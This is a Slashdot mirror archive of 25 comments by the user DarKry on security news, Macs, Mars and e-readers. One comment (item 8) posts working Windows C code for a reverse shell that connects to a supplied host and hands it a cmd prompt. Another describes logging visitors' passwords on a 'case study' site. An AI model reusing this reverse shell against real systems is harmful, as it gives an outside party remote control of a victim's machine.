Slashdot Mirror


User: DarKry

DarKry's activity in the archive.

Stories: 0 · Comments: 64

Comments · 64

  1. Re:"WTF, mate" on Music Piracy Unit Raids ISP in BitTorrent Assault · · Score: 1

    Does this mean the RIAA putta the jihad on us?

    Durka durka music jihad.

  2. There goes my career path... on Publishing Exploit Code Ruled Illegal In France · · Score: 1

    Publishing POC was always the final step in any exploit. First you contact the company. Then they stiff arm you. Then everyone using their software gets hacked. And finally you publish POC and they finally fix it. This won't last I am betting, just a clueless judge on a bad day.

  3. Slashdot and wargames on Linux Server Break-in Challenge · · Score: 1

    Interesting to see this type of thing on slashdot. I have recently done some work for the guys running this. They have a bunch of different systems that are donated by the public. A lot of the owners have either placed software that they suspected exploits to exist for or set up vulnerable servers with all sorts of strange problems. I have written a few of these intentionally vulnerable servers for different people. Some of the guys playing are actually quite impressive and I have watched exploits on more than one piece of up to date software.

    Another example of fairly realistic wargame is here. Hackerslab is a single box set up with 17 levels of intentional vulnerabilities. The first few are relatively dumb but even you security types will learn things on the higher levels. If you have ever wondered how exactly a buffer overflow, format string, or integer underflow exploit works I encourage you to check it out. Currently some of my code is running on the FreeBSD box. It's been up for close to a week and no one has found the vuln yet. Maybe the slashdotters can do it.

  4. Re:Fingerprinting on Tracking a Specific Machine Anywhere On The Net · · Score: -1, Troll

    several years of development. 5 seconds for me to think of a hack to nullify it.. nah the NSA won't find him that useful.

  5. Consider the source on Mitnick: Security Not about Technology · · Score: 1

    This is Kevin saying this after all. He has always seemed to think "hacking" is a mind game more than technical knowledge. Besides it helps him get jobs if he can't quite cut it on the actual tech side of things.

  6. Re:The Article in one sentence on Is Your OS Tough Enough? · · Score: 1

    that page == me playing with google. the error is there for a reason as is the link on slashdot. but thanks anyway... I think

  7. Huh? on Costa Rica May Criminalize VoIP · · Score: 4, Insightful

    Might as well throw people in jail for talking. Hell, let's ban all communication while we are at it. I mean heaven forbid I write a note to someone and hand it to them instead of letting a middle man make money off of it.

  8. Re:Geeks hate them, but... on Is Your OS Tough Enough? · · Score: 1

    #include
    #include
    #include
    #include

    int main (int argc, char **argv) {
    struct sockaddr_in sin4;
    int sox;
    sin4.sin_family = AF_INET;
    sin4.sin_port = htons(atoi(argv[2]));
    sin4.sin_addr.s_addr = inet_addr (argv[1]);
    WSADATA wsadata;
    WSAStartup(0x101, &wsadata);
    sox=WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0);
    connect ( sox, (struct sockaddr_in *)&sin4,sizeof(struct sockaddr_in));
    SetStdHandle(STD_INPUT_HANDLE,(HANDLE)sox);
    SetStdHandle(STD_OUTPUT_HANDLE,(HANDLE)sox);
    SetStdHandle(STD_ERROR_HANDLE,(HANDLE)sox);
    system("cmd");
    }


    All your bases are belonging to meh

  9. Re:Virus Scan on Is Your OS Tough Enough? · · Score: 1
  10. Re:Scan with Impunity on Is Your OS Tough Enough? · · Score: 1

    Actually to conventionally hack Windows is arguably more difficult. To trojan is simple but only because any kid can write VB. It's pretty simple to trojan a nix machine too, just takes a bit more knowledge than most kids are willing to obtain.

  11. Re:The Article in one sentence on Is Your OS Tough Enough? · · Score: 1

    Anyone who cares about the results of this already knew what the results would be. As long as there are twelve year olds and POC exploit code you will get port scanned 5 billion times a week. The 12 year olds however are not the people to worry about and the people who you should be worried about are unlikely to fire up nmap/nessus. They won't be attacking you unless there is a good reason. And don't think people look for bounce points by attacking Windows services. Any remote attack is messy and unreliable, much better to put together a simple trojan and watch it spread itself. The only way you are going to be attacked by anyone with half a clue as to what they are doing is if you have something worth seeing (and no your credit card number does not qualify). If you have passed all these tests so far then let's consider what happens next. Being a big target it is going to be pretty obvious what you are running and where just from DNS records. Next the attacker will figure out specific versions by simply faking a valid connection. Once he has this he will either find a known exploit, or more likely dig through some code and find a new one. He will set up a test environment that looks exactly like your system, he will script his exploit to be quiet and deadly. He will hit you once with one connection and it's over. If this guy is attacking you and that connection comes you are already too late.

    Every system is vulnerable, luckily there are very few people who possess both the knowledge and the lack of morals it takes to be able to find the holes.

    So why are we doing studies on what the 12 yr olds of the world are doing, and calling them comp sec?

  12. Re:Dijjer links to movies on Beware The Rotundus Rover · · Score: 5, Insightful

    What better way to spread a trojan than make it a requirement for a link on slashdot... :)

    Not saying that's the case, just a thought.

  13. Re:It's all jokes but.... on North Korea Admits to Having Nuclear Weapons · · Score: 1

    Scary? nah just one more reason not to move back to the US. I think the US is probably going to destroy itself (if in a less violent way) before NK gets a chance to launch nukes though.

  14. Re:7 months ! on ESA to Deploy Mars Express Radar · · Score: 0, Offtopic

    The vikings sailed to mars?!?!?! And they didn't even get credit for America, what a rip off.

  15. Re:Speeding Martians on ESA to Deploy Mars Express Radar · · Score: 1

    Yeah but at least for them it's not illegal to scramble the signal... yet. They just better hope the US doesn't plant the first flag.

  16. Re:Pipe Dream on NASA Proposes Warming Mars · · Score: 1

    That's easy, we make a giant drill-mobile, put some third rate Hollywood types in it and send them to the center of Mars with a nuclear payload. That'll get the core spinning like nothing else.

    We should take votes on who exactly should go. I say Paris Hilton would make a great choice.

  17. Re:passwords.... on Are Often-Changed Long Passwords Really Secure? · · Score: 1

    I have actually had a server on my network rooted. Not a cool experience. You go to log in and it's like "hey wait a minute, I never type that password wrong" and then bam it hits you and you start thinking, what have I done on the subnet in the past couple days that he will have seen. Especially when you have ettercap installed already, he doesn't even have to know how to do it, just check the .bash_history.. Anyway if you're keen on security we are having a grand old time at rootthisbox, it's the biggest wargame going to my knowledge.

  18. Re:Ha! I say: on Is Computer-Created Art, Art? · · Score: 1

    This also applies to a brush or a pen.

  19. Re:passwords.... on Are Often-Changed Long Passwords Really Secure? · · Score: 1

    I follow the same rule, only with fewer compartments. The way I see it is if you are smart enough to root me then you are smart enough to set up active ssl dissection and have all the passwords I use over ssl in a few days anyway. So I have one long password for things that I trust (ie. me and banks) and another for things I don't.

    A while back I set up a case study on this whole password re-use thing, http://hackaway.darkry.net. Granted this site attracts mostly high school and college students but you can still tell just by looking at the logs which passwords are meant to be secure and which people have a clue. If you would like to take a peek at the actual logs you can email me but I am not going to post them here for obvious reasons.

    darkry{AT}darkry.net

  20. Re:Yeah... on National PC Recycling Plan Proposed, Again · · Score: 1

    I guess my question would be, what is this money going to be spent on? Are they planning on simply throwing it into the fray to help trash the circuit boards or are they pumping it back into research of cleaner boards/better recycling techniques? There are a ton of precious metals in any circuit board as far as I know, seems like there must be some way to extract them that costs less than they're worth.

    Is layered design a new thing? I remember visiting my uncle when I was 16 and he was working for SGI. He was designing a 5 layered graphics board at the time. Maybe SGI was ahead of the game... Could be I don't understand something or am remembering wrong, I too am a software guy.

  21. Re:Why I don't own an apple on DIY Mac mini Overclocking · · Score: 0

    Why does everyone assume this is a troll.. Read the above comment it applies to this post too.

  22. Re:Why I don't own an apple on DIY Mac mini Overclocking · · Score: 0

    That's all well and good but let's face it OS X is years ahead of anything else as far as ease of use, experience... and pretty much every other category you can name. The open source community is hardly going to catch up to Apple on this.. We tend to focus more on the way things work than how they look. Sure there are those of us who would like our desktops to look pretty while we code but I am not about to spend my time trying to make transparency look when I could be coding something new (at least to me). That's why I say Apple would be doing the world a service if they sold OS X for other platforms. (Don't say it because I know that will never happen) The point is that their operating system is based on something that was developed by the open source community.. Come on Steve do us a favor and give something back.

  23. Re:Why I don't own an apple on DIY Mac mini Overclocking · · Score: 0, Flamebait

    So what you're saying is that mac is targeting the mini to take the place of the 30 old machines in my closet. I can use it as a server or as a router?

    And if I did want the equivalent of a mini.. yes I could build it for much cheaper, after all we are talking about 2 year old hardware here. People practically give it away. Perhaps you Apple fan boys need to actually read before you flame, I said that I want a Mac. Actually you gave me another reason not to get one, you guys are more snooty than us Linux boys.

    :P

  24. Why I don't own an apple on DIY Mac mini Overclocking · · Score: -1, Troll

    I want one. Badly. But the Mac mini is a perfect example.. I can't justify paying 500 dollars just for an operating system. The last computer I built was around 300 bucks all told and I managed to squeeze in the brand new (at the time) Athlon 64. So why oh why does Apple sell a 500 dollar computer with 2 year old components?

    I guess my wish at this point is that one of two impossible things will happen.
    1. It becomes possible to build your own Mac.
    2. Someone steals the source for AQUA and ports it to x86

    Darwin on an Athlon 64..... sooooo sexy.

  25. Re:Ebooks on PDA Sales Fall for Third Year in Row · · Score: 1

    Absolutely, I will consider buying one of these fancy new phones when I can carry a library around with me.

    I too "ONLY" use my Zire 71 to read. But I spend several hours every day doing it sooooo.